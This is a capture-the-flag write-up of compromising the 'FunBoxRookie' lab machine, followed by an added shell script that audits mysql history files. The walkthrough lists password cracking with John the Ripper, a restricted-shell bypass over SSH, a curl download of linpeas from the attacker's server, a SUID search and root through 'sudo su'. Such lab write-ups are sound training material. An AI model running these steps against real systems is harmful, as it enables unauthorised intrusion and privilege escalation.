🐧FunBoxRookie
IP : 192.168.84.107
Initial Scan
nmap 192.168.84.107 -p- -sV -A

Port 21 Enum
FTP is allowing anonymous login. Downloaded all zip files.
Port 80 Enum


Port 80 seems to be a dead end.
Shell
Found that each zip file was password protected.
Ran zip2john *.zip > zipfile.hash
to get a hash for each zip file.
Ran John the Ripper against zipfile.hash
john zipfile.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

Unable to connect via SSH with Cathrine's account.
Connected via SSH with Tom
ssh [email protected] -i id_rsa_tom
Found local.txt flag in Tom's home folder.
Rbash restricting commands

Found restricted Shell Bypass
ssh [email protected] -i id_rsa_tom -t "bash --noprofile"
Source : https://0xffsec.com/handbook/shells/restricted-shells/
Started python http server and grabbed Linpeas.
curl http://192.168.49.84:8000/linpeas.sh -o linpeas.sh
Changed linpeas.sh perms
chmod 777 linpeas.sh
Got stuck at Priv Esc - Must get better at Priv Esc. Had to get a hint to read mysql_history.
Files in Tom's home directory

Submitted hash in local.txt
Read all files starting with .
cat .*
Found that there is a SQL entry with Tom's credentials in .mysql_history.
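
Defender's view of the finding above, as an added example that is not part of the original notes: a small shell audit that decodes a mysql client history file and flags statements and file modes worth reviewing. The `_HiStOrY_V2_` header and `\040` escaping are how libedit-built mysql clients write the file; the keyword heuristic, the `staff` table and the sample values are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit a mysql client history
# file for statements that may expose credentials to anyone with a shell.

# Print the history with libedit escaping undone (\040 = space) and the
# "_HiStOrY_V2_" header line dropped.
decode_history() {
    sed -e '/^_HiStOrY_V2_$/d' -e 's/\\040/ /g' "$1"
}

# Print "N:statement" for every statement worth reviewing. Heuristic (an
# assumption of this example): credential keywords, or any INSERT/UPDATE,
# since their literal values are stored in clear text.
flag_statements() {
    decode_history "$1" |
        grep -inE 'identified +by|passw|pwd|secret|^ *(insert +into|update) ' || true
}

# Succeed if the file is readable by group or others.
is_exposed() {
    [ -n "$(find "$1" -prune \( -perm -g=r -o -perm -o=r \) 2>/dev/null)" ]
}

# Audit one file; print findings, return 1 if anything needs attention.
audit_history() {
    rc=0
    hits=$(flag_statements "$1")
    if [ -n "$hits" ]; then
        printf '%s: statements to review\n%s\n' "$1" "$hits"; rc=1
    fi
    if is_exposed "$1"; then
        printf '%s: readable by group/others, expected mode 600\n' "$1"; rc=1
    fi
    return "$rc"
}

# Constructed sample history (hypothetical table and values, not the box's data).
write_sample() {
    printf '%s\n' '_HiStOrY_V2_' 'show\040databases;' \
        'insert\040into\040staff\040values\040("alice",\040"Example-Pass1");' \
        'select\040*\040from\040staff;' > "$1"
}

sample=$(mktemp) && write_sample "$sample" && chmod 644 "$sample"
audit_history "$sample" || echo "remediate: rotate the secret, truncate the file, chmod 600"
rm -f "$sample"
```

Pointing `audit_history` at each user's `~/.mysql_history` gives the same report; setting `MYSQL_HISTFILE=/dev/null` for the account stops the client from writing the file at all.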

Linpeas found the initial stickied binaries, but ran the following for good measure
find / -perm -u=s -type f 2>/dev/null
Source : https://medium.com/go-cyber/linux-privilege-escalation-with-suid-files-6119d73bc620
Found that su is stickied.

Root
sudo su

https://gtfobins.github.io/gtfobins/su/
Also logged back in with SSH to the restricted shell to test the at sticky privilege escalation.
